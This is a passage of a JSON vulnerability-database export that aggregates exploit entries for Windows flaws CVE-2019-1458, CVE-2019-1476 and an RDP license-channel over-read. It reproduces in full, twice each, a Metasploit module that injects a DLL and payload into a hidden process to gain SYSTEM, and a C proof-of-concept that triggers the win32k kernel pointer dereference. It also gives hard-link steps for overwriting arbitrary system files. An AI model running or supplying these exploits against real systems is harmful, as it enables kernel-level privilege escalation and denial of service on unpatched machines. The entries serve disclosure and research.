"acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1485"], "modified": "2019-12-10T00:00:00", "id": "CPAI-2019-1574", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-10-15T19:31:18", "description": "", "cvss3": {}, "published": "2020-10-15T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Uninitialized Variable Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T00:00:00", "id": "PACKETSTORM:159569", "href": "https://packetstormsecurity.com/files/159569/Microsoft-Windows-Uninitialized-Variable-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/file' \nrequire 'msf/core/exploit/exe' \nrequire 'msf/core/post/windows/priv' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation', \n'Description' => %q{ \nThis module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability \nwithin win32k which occurs due to an uninitalized variable, which allows user mode attackers \nto write a limited amount of controlled data to an attacker controlled address \nin kernel memory. By utilizing this vulnerability to execute controlled writes \nto kernel memory, an attacker can gain arbitrary code execution \nas the SYSTEM user. \n \nThis module has been tested against Windows 7 x64 SP1. Offsets within the \nexploit code may need to be adjusted to work with other versions of Windows. \nThe exploit can only be triggered once against the target and can cause the \ntarget machine to reboot when the session is terminated. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'piotrflorczyk', # poc \n'unamer', # exploit \n'timwr', # msf module \n], \n'Platform' => 'win', \n'SessionTypes' => ['meterpreter'], \n'Targets' => \n[ \n['Windows 7 x64', { 'Arch' => ARCH_X64 }] \n], \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS ], \n'Reliability' => [ UNRELIABLE_SESSION ] \n}, \n'References' => \n[ \n['CVE', '2019-1458'], \n['URL', 'https://github.com/unamer/CVE-2019-1458'], \n['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'], \n['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'], \n['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html'] \n], \n'DisclosureDate' => '2019-12-10', \n'DefaultTarget' => 0, \n'AKA' => [ 'WizardOpium' ] \n) \n) \nregister_options([ \nOptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe']) \n]) \nend \n \ndef setup_process \nprocess_name = datastore['PROCESS'] \nbegin \nprint_status(\"Launching #{process_name} to host the exploit...\") \nlaunch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true) \nprocess = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Sandboxes could not allow to create a new process \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \nprocess \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe \nend \n \nfile_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys') \nmajor, minor, build, revision, branch = file_version(file_path) \nvprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\") \n \nbuild_num_gemversion = Gem::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\") \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607 \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \nsuper \n \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] != ARCH_X64 \nfail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported') \nend \n \nprocess = setup_process \nlibrary_data = exploit_data('CVE-2019-1458', 'exploit.dll') \nprint_status(\"Injecting exploit into #{process.pid} ...\") \nexploit_mem, offset = inject_dll_data_into_process(process, library_data) \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \nencoded_payload = payload.encoded \npayload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159569/cve_2019_1458_wizardopium.rb.txt"}, {"lastseen": "2020-03-09T22:44:29", "description": "", "cvss3": {}, "published": "2020-03-06T00:00:00", "type": "packetstorm", "title": "Microsoft Windows WizardOpium Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1458"], "modified": "2020-03-06T00:00:00", "id": "PACKETSTORM:156651", "href": "https://packetstormsecurity.com/files/156651/Microsoft-Windows-WizardOpium-Local-Privilege-Escalation.html", "sourceData": "`#include <cstdio> \n#include <windows.h> \n \nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii); \n \nint main() { \nHINSTANCE hInstance = GetModuleHandle(NULL); \n \nWNDCLASSEX wcx; \nZeroMemory(&wcx, sizeof(wcx)); \nwcx.hInstance = hInstance; \nwcx.cbSize = sizeof(wcx); \nwcx.lpszClassName = L\"SploitWnd\"; \nwcx.lpfnWndProc = DefWindowProc; \nwcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0 \n \nprintf(\"[*] Registering window\\n\"); \nATOM wndAtom = RegisterClassEx(&wcx); \nif (wndAtom == INVALID_ATOM) { \nprintf(\"[-] Failed registering SploitWnd window class\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Creating instance of this window\\n\"); \nHWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \nif (sploitWnd == INVALID_HANDLE_VALUE) { \nprintf(\"[-] Failed to create SploitWnd window\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\"); \nNtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1); \n \nprintf(\"[*] Allocate memory to be used for corruption\\n\"); \nPVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); \nprintf(\"\\tptr: %p\\n\", mem); \nPBYTE byteView = (PBYTE)mem; \nbyteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow \n \n//pass DrawSwitchWndHilite double dereference \nPVOID* ulongView = (PVOID*)mem; \nulongView[0x20 / sizeof(PVOID)] = mem; \n \nprintf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\"); \nSetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem); \nprintf(\"[*] GetLastError = %x\\n\", GetLastError()); \n \nprintf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\"); \nHWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \n \nprintf(\"[*] Simulating alt key press\\n\"); \nBYTE keyState[256]; \nGetKeyboardState(keyState); \nkeyState[VK_MENU] |= 0x80; \nSetKeyboardState(keyState); \n \nprintf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\"); \nNtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1); \n} \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156651/mswindowswizard-escalate.txt"}, {"lastseen": "2019-12-13T14:43:11", "description": "", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "packetstorm", "title": "AppXSvc 17763 Arbitrary File Overwrite", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1476", "CVE-2019-0841"], "modified": "2019-12-11T00:00:00", "id": "PACKETSTORM:155653", "href": "https://packetstormsecurity.com/files/155653/AppXSvc-17763-Arbitrary-File-Overwrite.html", "sourceData": "`# Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS) \n# Date: 2019-10-28 \n# Exploit Author: Gabor Seljan \n# Vendor Homepage: https://www.microsoft.com/ \n# Version: 17763.1.amd64fre.rs5_release.180914-1434 \n# Tested on: Windows 10 Version 1809 for x64-based Systems \n# CVE: CVE-2019-1476 \n \n# Summary: \n# AppXSvc improperly handles file hard links resulting in a low privileged user \n# being able to overwrite an arbitrary file leading to elevation of privilege. \n \n# Description: \n \n# An elevation of privilege vulnerability exists when the AppX Deployment Server \n# (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841 \n# originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced \n# to overwrite an arbitrary file by deleting all registry data files before \n# creating the file hard link. As Nabeel Ahmed described in his write-up of \n# CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with \n# the original settings.dat template. However, additional settings.dat.LOG1 and \n# settings.dat.LOG2 files are also created during the initialization process. \n# Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard \n# link allows a low privileged user to overwrite an arbitrary file with registry \n# data or just simply empty it, respectively. A low privileged user could exploit \n# this vulnerability to cause denial of service by overwriting critical system \n# files. \n \nSteps to reproduce: \n1. Terminate Paint 3D processes. \n2. Delete settings.* files in Microsoft.MSPaint_8wekyb3d8bbwe\\Settings folder. \n3. Create a hard link from settings.dat.LOG1 to C:\\Windows\\win.ini. \n4. Execute the start ms-paint: command to run Paint 3D. \n5. Terminate Paint 3D processes. \n \nExpected result: \nIt isn't possible to overwrite a file not writable by a low privileged user. \n \nObserved result: \nC:\\Windows\\win.ini file is overwritten with registry data. \n \nReferences: \nhttps://github.com/sgabe/CVE-2019-1476 \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476 \nhttps://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841 \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/155653/appxsvc17763-overwrite.txt"}], "zdt": [{"lastseen": "2023-06-13T15:06:24", "description": "This Metasploit module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitialized variable, which allows user mode attackers to write a limited amount of controlled data to an attacker controlled address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against the target and can cause the target machine to reboot when the session is terminated.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-15T00:00:00", "type": "zdt", "title": "Microsoft Windows Uninitialized Variable Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T00:00:00", "id": "1337DAY-ID-35039", "href": "https://0day.today/exploit/description/35039", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/file'\nrequire 'msf/core/exploit/exe'\nrequire 'msf/core/post/windows/priv'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',\n 'Description' => %q{\n This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n to write a limited amount of controlled data to an attacker controlled address\n in kernel memory. By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'piotrflorczyk', # poc\n 'unamer', # exploit\n 'timwr', # msf module\n ],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows 7 x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS ],\n 'Reliability' => [ UNRELIABLE_SESSION ]\n },\n 'References' =>\n [\n ['CVE', '2019-1458'],\n ['URL', 'https://github.com/unamer/CVE-2019-1458'],\n ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],\n ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],\n ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']\n ],\n 'DisclosureDate' => '2019-12-10',\n 'DefaultTarget' => 0,\n 'AKA' => [ 'WizardOpium' ]\n )\n )\n register_options([\n OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])\n ])\n end\n\n def setup_process\n process_name = datastore['PROCESS']\n begin\n print_status(\"Launching #{process_name} to host the exploit...\")\n launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)\n process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe\n end\n\n file_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys')\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n build_num_gemversion = Gem::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\")\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n def exploit\n super\n\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] != ARCH_X64\n fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')\n end\n\n process = setup_process\n library_data = exploit_data('CVE-2019-1458', 'exploit.dll')\n print_status(\"Injecting exploit into #{process.pid} ...\")\n exploit_mem, offset = inject_dll_data_into_process(process, library_data)\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n encoded_payload = payload.encoded\n payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n end\nend\n", "sourceHref": "https://0day.today/exploit/35039", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-02T09:33:12", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "zdt", "title": "Microsoft Windows - (WizardOpium) Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2020-03-09T00:00:00", "id": "1337DAY-ID-34066", "href": "https://0day.today/exploit/description/34066", "sourceData": "#include <cstdio>\n#include <windows.h>\n\nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);\n\nint main() { \n HINSTANCE hInstance = GetModuleHandle(NULL);\n\n WNDCLASSEX wcx;\n ZeroMemory(&wcx, sizeof(wcx));\n wcx.hInstance = hInstance;\n wcx.cbSize = sizeof(wcx);\n wcx.lpszClassName = L\"SploitWnd\";\n wcx.lpfnWndProc = DefWindowProc;\n wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0\n \n printf(\"[*] Registering window\\n\");\n ATOM wndAtom = RegisterClassEx(&wcx);\n if (wndAtom == INVALID_ATOM) {\n printf(\"[-] Failed registering SploitWnd window class\\n\");\n exit(-1);\n }\n\n printf(\"[*] Creating instance of this window\\n\");\n HWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\n if (sploitWnd == INVALID_HANDLE_VALUE) {\n printf(\"[-] Failed to create SploitWnd window\\n\");\n exit(-1);\n }\n\n printf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\");\n NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);\n\n printf(\"[*] Allocate memory to be used for corruption\\n\");\n PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n printf(\"\\tptr: %p\\n\", mem);\n PBYTE byteView = (PBYTE)mem;\n byteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow\n\n //pass DrawSwitchWndHilite double dereference\n PVOID* ulongView = (PVOID*)mem;\n ulongView[0x20 / sizeof(PVOID)] = mem;\n\n printf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\");\n SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);\n printf(\"[*] GetLastError = %x\\n\", GetLastError());\n\n printf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\");\n HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\n\n printf(\"[*] Simulating alt key press\\n\");\n BYTE keyState[256];\n GetKeyboardState(keyState);\n keyState[VK_MENU] |= 0x80;\n SetKeyboardState(keyState);\n\n printf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\");\n NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);\n}\n", "sourceHref": "https://0day.today/exploit/34066", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "talos": [{"lastseen": "2023-06-13T15:02:08", "description": "### Summary\n\nAn exploitable denial-of-service vulnerability exists in the RDP8 implementation of Microsoft\u2019s Remote Desktop Services. A certain component of license negotiation can allow a remote client to read an amount of memory that is controlled by the client. Due to this, a client can coerce the component to read from memory that is unmapped, resulting in a denial-of-service condition. An attacker can negotiate capabilities and then send a particular packet type in order to trigger this vulnerability.\n\n### Tested Versions\n\nMicrosoft\u2019s Remote Desktop Services \u2013 Windows 7: RdpCoreTS.dll 6.2.9200.22828\n\n### Product URLs\n\n<https://docs.microsoft.com/en-us/windows/win32/termserv/terminal-services-portal>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-126: Buffer Over-read\n\n### Details\n\nRemote Desktop Services allow a user or administrator to take control of a remote computer over a network connection. This allows the user to utilize a familiar graphical user interface to interact with said remote machine which provides a thin-client architecture on the Windows platform. These capabilities are accomplished using the Remote Desktop Protocol which is built on top of the X.224, T.124, T.125, T.128 protocols. Remote Desktop Services is a common service within the enterprise and is commonly used as a work-around on a network with otherwise minimalistic remote administration capabilities.\n\nWhen a client initializes a connection via the RDP protocol, the client must first go through a number of stages in order to setup each of the individual layers that are used by the RDS platform. During setup of the T.125 layer, a client may announce a number of channels by name that the server is expected to connect to an endpoint. After establishing this and performing the rest of the required negotiations, the client will then perform a security exchange which is required to complete the initialization of the T.128 protocol which will provide the Multipoint Application Sharing component as mentioned in the T.128 specification. After performing this security exchange, the client will then need to negotiate capabilities with the remote server. This is done by first receiving a packet from the server containing the supported capabilities, followed by a response from the client with the capabilities that it will use. After this has been accomplished, the server will then connect the channel names requested by the client to their endpoints and then perform the license exchange. Due to the server using the same channel protocol for things such as the license exchange, and a number of other capabilities, a remote client can establish a connection to these internal channels and interact with the logic of their endpoint. One of the packet types parsed by its endpoint allows a user to specify a length that will be used to make an allocation, and use it as a length when copying data from the packet into the buffer. Due to the client controlling the length, this can enable the client to specify a length that is larger than the packet resulting in potentially reading an unmapped memory resulting in a denial of service condition.\n\nWhen establishing a connection, the server will instantiate a `CUMRDPConnection` object. This object appears to be an abbreviation of \u201cUser-mode RDP Connection\u201d. Once this object has been constructed to manage the connection from the client, the `CUMRDPConnection::CreateVirtualChannel` method will be called for each channel. This method will eventually check its parameter using `stricmp()` to see if the channel name that was passed to it is one of the strings listed. At [1], if the channel name is \u201crdplic\u201d the application will go down a branch where a failure should be returned. Nonetheless, this list contains a number of channel endpoints that the remote client is able to communicate with by writing to the channel via the T.125 protocol. It is assumed by the author that these endpoints are not intended to be reachable by a remote client as the implementation in `RdpCoreTS.dll` seems to write undocumented structures to these different channel endpoints.\n \n \n rdpcorets!CUMRDPConnection::CreateVirtualChannel:\n 000007fe`f9ae191c 48895c2410 mov qword ptr [rsp+10h],rbx\n 000007fe`f9ae1921 4489442418 mov dword ptr [rsp+18h],r8d\n 000007fe`f9ae1926 55 push rbp\n 000007fe`f9ae1927 56 push rsi\n 000007fe`f9ae1928 57 push rdi\n 000007fe`f9ae1929 4154 push r12\n 000007fe`f9ae192b 4155 push r13\n 000007fe`f9ae192d 4156 push r14\n 000007fe`f9ae192f 4157 push r15\n 000007fe`f9ae1931 4883ec40 sub rsp,40h\n ...\n rdpcorets!CUMRDPConnection::CreateVirtualChannel+0x212:\n 000007fe`f9ae1b2e 488d0d932df7ff lea rcx,[rdpcorets!`string' (000007fe`f9a548c8)] ; \"DRDYNVC\"\n 000007fe`f9ae1b35 498bd7 mov rdx,r15\n 000007fe`f9ae1b38 ff15ca822700 call qword ptr [rdpcorets!_imp__stricmp (000007fe`f9d59e08)]\n 000007fe`f9ae1b3e 85c0 test eax,eax\n 000007fe`f9ae1b40 0f840c010000 je rdpcorets!CUMRDPConnection::CreateVirtualChannel+0x336 (000007fe`f9ae1c52)\n ...\n 000007fe`f9ae1b46 488d0d832df7ff lea rcx,[rdpcorets!`string' (000007fe`f9a548d0)] ; \"rdpgrfx\"\n 000007fe`f9ae1b4d 498bd7 mov rdx,r15\n 000007fe`f9ae1b50 ff15b2822700 call qword ptr [rdpcorets!_imp__stricmp (000007fe`f9d59e08)]\n 000007fe`f9ae1b56 85c0 test eax,eax\n 000007fe`f9ae1b58 0f84f4000000 je rdpcorets!CUMRDPConnection::CreateVirtualChannel+0x336 (000007fe`f9ae1c52)\n ...\n 000007fe`f9ae1b5e 488d0d732df7ff lea rcx,[rdpcorets!`string' (000007fe`f9a548d8)] ; \"rdpinpt\"\n 000007fe`f9ae1b65 498bd7 mov rdx,r15\n 000007fe`f9ae1b68 ff159a822700 call qword ptr [rdpcorets!_imp__stricmp (000007fe`f9d59e08)]\n 000007fe`f9ae1b6e 85c0 test eax,eax\n 000007fe`f9ae1b70 0f84dc000000 je rdpcorets!CUMRDPConnection::CreateVirtualChannel+0x336 (000007fe`f9ae1c52)\n ...\n 000007fe`f9ae1b76 488d0d632df7ff lea rcx,[rdpcorets!`string' (000007fe`f9a548e0)] ; \"rdpcmd\"\n 000007fe`f9ae1b7d 498bd7 mov rdx,r15\n 000007fe`f9ae1b80 ff1582822700 call qword ptr [rdpcorets!_imp__stricmp (000007fe`f9d59e08)]\n 000007fe`f9ae1b86 85c0 test eax,eax\n 000007fe`f9ae1b88 0f84c4000000 je rdpcorets!CUMRDPConnection::CreateVirtualChannel+0x336 (000007fe`f9ae1c52)\n ...\n 000007fe`f9ae1b8e 488d0d532df7ff lea rcx,[rdpcorets!`string' (000007fe`f9a548e8)] ; [1] \"rdplic\"\n 000007fe`f9ae1b95 498bd7 mov rdx,r15\n 000007fe`f9ae1b98 ff156a822700 call qword ptr [rdpcorets!_imp__stricmp (000007fe`f9d59e08)]\n 000007fe`f9ae1b9e 85c0 test eax,eax\n 000007fe`f9ae1ba0 0f84ac000000 je 